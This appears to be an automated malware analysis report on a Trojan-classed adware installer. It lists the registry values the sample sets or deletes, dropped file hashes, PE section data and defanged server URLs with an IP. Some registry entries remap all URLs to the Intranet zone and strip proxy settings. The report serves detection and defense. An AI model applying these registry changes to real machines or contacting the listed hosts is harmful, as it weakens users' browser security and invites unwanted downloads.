"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D6 08 62 69 FB 1D D7 C3 17 99 0C 1D 7D 37 3E 0D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process 0ead95b.exe:2928 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\InstalledBrowserExtensions\21836]
"70881" = "Ge-ForcePlus v3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 A8 DA 9E 27 CD 41 C9 5C 1B 0A B5 B9 42 C3 9F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836]
"70881" = "Ge-ForcePlus v3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
05c47da12b0009bd98653f51287f7768 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_14684\bxsdk32.dll
ec1562d1d3b6143db2c15fd0b7f43e55 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_14684\ins_geforce.exe
ff88aa4b5c5eee5b1ed33d88d12468ff c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_14684\ins_sense.exe
8eaa7e23e6aa005980487eb864dcaa53 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_14684\ins_shopperpro.exe
4896a79dc5d7d13664d44323a0347a75 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsb9.tmp\AccDownload.dll
faa7f034b38e729a983965c04cc70fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsb9.tmp\nsProcess.dll
904beebec2790ee2ca0c90fc448ac7e0 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsj6.tmp\D1958.dll
23c72924e6d3c5de37b9f69f9847488d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_a
921dd2e7693578fe287db2f3c3394197 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_a

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 2.8.0.999
Legal Copyright: Copyright (C) 2014
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.8.0.999
File Description:
Comments:
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 870431 870912 4.35107 a91c25802f16ed5a4c3dc74af9769a5f
.rdata 876544 260036 260096 3.00516 bb1bb3a1a95fc9690bd43050c64a73b1
.data 1138688 25064 12800 3.17973 1e20b50bab27ac331dfa83810038eb04
.rsrc 1167360 244152 244224 4.40217 ecbddcde0a476bece4704c768f4bee6b
.reloc 1413120 42964 43008 4.59598 05f867e1497d81cf4fe101c20d2b913f

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=043Mckb8Lnhw7iCtSAyu/0Q1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FePEEASnTAt8o vdWl3XnoKt0JQd5HxgIXd4Ck/GAouPo3pu1a2/pSyUlKYWIS4b/TwQz5kcPJsPBXgEPYkm2R 4CM84BubBye2orW/U9pNYEne5haHOFLYKd5SlKONgbzwnZSRpvuXhKkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndFPhdC l28/ a9Ya/86pUpQ3MNfQbUufSXu086SR5S8= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAtaAQab8C2sQTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45uF9cPGatNIrtBuWC5fkm vE4nW28 Q65 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMC09xUUAqoccNCUHeR8YCF3RMhMhveZGB/8e7kw1yV54DHh RP9FBwluXtX58AbVGLqY0nw4ErLtxha/ J3llgZ187AT1rhu GGW2I O4PkTUw1aLHDaMdxJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovfwqbgkyABd 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAmyeS/0faBVTdVMo67fxO0s IILilpWF2Et8EPpFBXSUCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndFPhdC l28/ a9Ya/86pUpQ3MNfQbUufSXu086SR5S8= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAmyeS/0faBVTdVMo67fxO0s IILilpWF1B5eyhynK5il gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBd7kwVzNWOrfuirThnOyWCqILJt Jqyltk= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAmyeS/0faBVTdVMo67fxO0s IILilpWF0JzvOmbeJDXy5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjm4X1w8Zq00iu0G5YLl Sb68Tidbbz5Drk= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAmyeS/0faBVTdVMo67fxO0s IILilpWF0vmoXMQKU1KtudqV021AKZU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=oE Olq3N8DJENRlsCDLYcDgfC1V7eKoWgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsk7q1DqDoShwFmblcMjHXReA74CIMkIVuBTjoJMNpFu87wf8xFonEcPDYfiiZa9KEaTBgykGtBXjxBAEp0wLfKOWnHKXQ4ByT9CUHeR8YCF3cICI7/tQlejZeojEglKF4ySWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qL38Km4JMgAXQ== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=oE Olq3N8DJENRlsCDLYcDgfC1V7eKoWgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsk7q1DqDoShwFmblcMjHXReA74CIMkIVuBTjoJMNpFu87wf8xFonEcPDYfiiZa9KEaTBgykGtBXjxBAEp0wLfKOcXM978RrvxgTxIUcsgQ w0eteH8KxBtakHX utQO2t7GJ7NLKRj9nU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=oE Olq3N8DJENRlsCDLYcDgfC1V7eKoWgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsk7q1DqDoShwFmblcMjHXReA74CIMkIVuBTjoJMNpFu87wf8xFonEcPDYfiiZa9KEaTBgykGtBXjGxrTqW15vZAooxpS5ufgquJVjHmrT0TCdGBVM3gUbVwDpXxHWgmjuq9qGTCPFxGMacNTVL60tsKrgHWJBZg2eTkxN6pxw89Ap19bfV/XketHQPSr00xn/pt5BjWOuab4BLZMo3KhL4A7oa41N9YhxikzL8hyzXRMc0g1gcxjite /Y3KN3CLINidK03d0MuzZPHJU0qA9vA9GanF1RNNmMzXUezINFlsIV5dJNE8xQtEL6kO6MAPPRk3pYsWha92dV1 PcKMtTouTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45uF9cPGatNIrtBuWC5fkm vE4nW28 Q65 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XMVCZIctrluXs30ehTmVX1mzeUpkoQZA95XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp1pO0uZjbwWll7Nx/213VNE6JXbpA88dZXJ6A7OzALu5zbBYCuaAtAvGkllEOJq0sp3jz2it1PuY hmSQlakOO/yw2dOqRz0VTJIBlhaXll/jgb6v7cXpPsHbyM38hHiddP9Uf4p/RQ UMx9TNBbmkTjcSbV/8/K3y93eDbW4 bAU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XMVCZIctrluXs30ehTmVX1mzeUpkoQZA95XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp1pO0uZjbwWll7Nx/213VNE6JXbpA88dZXJ6A7OzALu5zbBYCuaAtAvGkllEOJq0sp3jz2it1PuY hmSQlakOO/yw2dOqRz0VTJIBlhaXll/jgb6v7cXpPsHbyM38hHidfzjtSC7/eFaNh3QJEALW3T8P/xsh451fiSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qL38Km4JMgAXQ== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=N6dOqWm8Q95rOakOyNRzsN5jOExRmJjcpL1q0D3vvXQ2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRo0ATae6NSkcvIROPie2z40 X0A62pnUj3KYX3Ti/i3YOBks urBi 1VbQfHq0QVBDarxXN1e/eRVfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXe5MFczVjq37oq04ZzslgqiCybfiaspbZ 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=N6dOqWm8Q95rOakOyNRzsN5jOExRmJjcpL1q0D3vvXQ2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRo0ATae6NSkcvIROPie2z40 X0A62pnUj3KYX3Ti/i3YMtu6Il6K42s07l01ouN0CW2hnxCMb9MQTrbPokHTCrpfDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMYIaukc1i7BWldmt6Vgk8tSuaFT9xqmWN6c2C4KGeMVjZ4jzc3YjAmYShy1QgM mULHn4xNjI6qV2YCgKhxKgoU= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=c0XmKevqA0lENRlsCDLYcGeakDLP0HwkgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsk7q1DqDoShwFmblcMjHXReA74CIMkIVuBTjoJMNpFu87wf8xFonEcPDYfiiZa9KEdPIgADxit2gnbJKYwPfuhCWcSucRpHa5xQC drCF7eFc68xQtOPoFeZZ3F95gs6nEVdjbbwQnHyVtB8erRBUENoBUzXpAW/ CSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qL38Km4JMgAXQ== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XMVCZIctrluXs30ehTmVX1moiejxERrnrFXGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp1pO0uZjbwWll7Nx/213VNE6JXbpA88dZXJ6A7OzALu5zbBYCuaAtAvGkllEOJq0sp3jz2it1PuYvKyHshi0NtNKXe7b3ey81Z7hCmg7VZxoKYX3Ti/i3YPRE4iM0F3Z8SSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qL38Km4JMgAXQ== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/15359.ashx?e=eFCD8T/coiezrE/yDXLQyd5jOExRmJjcfsQaZZXSd Q2fVsQFDtppP2TEkHeJNDUDPI5dGTWg7 SOxGOFR1rQ7/gCVcfJT7Zd/XCztdoPbJFiFlIaXxqEcmxw368usKjvx7ENkzRxOw/caEgn1aywgBPaL3foawtkjneDvF7aJsyFrdg9Bz4vxjVxaO/jmdPBGRotN0ABYeEjtD/tYznR 0LhpxXD4t4eCmOKii sWrz7yH4dpDjMWLUJGnTsXhlEK5u6pECdO1SxiNrRjAGZBB5aSy JFSFglNuW4n71dQey68r 4NN8VyKsbjLeBp4dMm3hqMstJ/y06twORtLg9fHR9A6p3upOM0S4XWXQNckrM9d9qKvEEB2Ep7ddBI2V0TFaJ4cExkLJWSC3b0K eCko9DIyNsADn6EXOLggZKypkVJN3kXvFA4InH5qGL6TgskKX3SgwYohnxsdae b8EiI8s6T8qHsyKop7n4S NokPwegfs5DA6y2ObHsF4aVuJuMr 09WnXl3jXxrL4WWiPc6F0Foo3zqD0Un5LpMl6Vac8KKMKQ dvxgza/aJvlagtVicvngwklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CaR2deZjme0S 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=W5y9y1UrGBkT/daslwwbUi1X0eix9R7PaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVUOgPoSQeroSQMPOYURUu2BNfh4qpckIN6kO9/DuORuprIIa1xct7ImOrIk6OakHpXG9WQc5JBBFaACykertHSFfOKWYd4uGNAB/MXM5vy8Es IILilpWF3E4CvODJISMmgJ1E0DOBKFm3OtmTG7fpbuOInD4IpbV04k1C4lssAWX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2Q== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/10266.ashx?e=NdvkYMTo1KsT/daslwwbUrln8Tc7JdzDaMzgTHP7UuxxTYwWxYG9WM2wWArmgLQLxpJZRDiatLLr8onAm2k8 UCN9h bV19VdXQO8eCkzNk9LWPkwGrB/imF904v4t2DTTuHrYVulo109x0h yMmOuOY6cLwcbD07lG1xkeY5jbRwdqu9soHjYgwamV62X9gO95zWp5ecIePiKgomzd5XT9xoSCfVrLCPk3SNaw1Hwyh7Gcj1ILXhdtXANK2UVVldUmBhCw8CHnrErQ9Bnn0aGNDEgQGSeDWcuFD/oqMC4ywj137NFRjrrStcIq/vZyTdriV4mPeB3fQbFCQv5BK9FdmE/yeJSe6i5CWtbGsRuHfTuvFpnVrlF9LGvMrDlXCLGhXnLEz5pbP YAvZ/SRS XEWbcA1chWcCJK1OHTiKZmXIkKgXd7TGpnBktR0W195FKDVXPs8UDrf7gVRTtqGyUpmLFbLFiWF8xS3bBaukC3g671NSdAWbPZE8t0P6yGa vpLH0m0oO jwDV6udpLox4w9PSLDKW3MoS/fu50NKaR9WivOCmrDK2XoJ06HUM62z6JB0wq6Xw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=Feo0TQZfu6KSwU3ck0YwnkQ1GWwIMthwsNv oCoFDuAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRbrsFepywjbPfV9OCtHXZfA3mXJEY39mHAhwsRGINruhhsseF9XKGr8l4l5 9UEJ lex/kVKG eu03e5/1jzsDq/1bjUefs49JU1ySiay1sqdymVuPyjsZ40oQa07NiSGd51jxu8kbC2zsHlRkWrcy9e991jqD0JbjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVUOgPoSQeroSQMPOYURUu2AUI/TbDoS6cQ== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=Feo0TQZfu6KSwU3ck0YwnkQ1GWwIMthwsNv oCoFDuAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRbrsFepywjbPfV9OCtHXZfA3mXJEY39mHAhwsRGINruja7CNvvxDM30ViblVFPL pCuWqMo7ZG/Qxztg6 4zwmphq5YRs3Ua3kOLZWZ3INLBBsDkaVI3Au2 WNxArStCUlpNEzah78fl5Xe6ZTKO9HKqfV3Ow7bWoU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=2fVCHF6kf8jCiOnT8Um5ot5jOExRmJjcwBNQmbxWl5I2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRoA0zlVyT prKPFGXl7hYw KKij 6dP1w7xUocEPa3glNDBcek3F/63nckoxBum7JNDqm5t3h0H90W4JQdY9P0gBy5EtCsvUaNdTeugB sfRAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0l7tPOkkeUv 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=obiBp3WOda9tb/LgACKPGkQ1GWwIMthw2qShU7Jjo1uAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRAKcFpVLy3NZgKkdlz1lRofr/zw3mMKgg0JQd5HxgIXcyW34jq/xhC69GO739HYqB8SJA d bWCFeYyujkXy401 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBd7kwVzNWOrfuirThnOyWCqILJt Jqyltk= 198.232.124.192
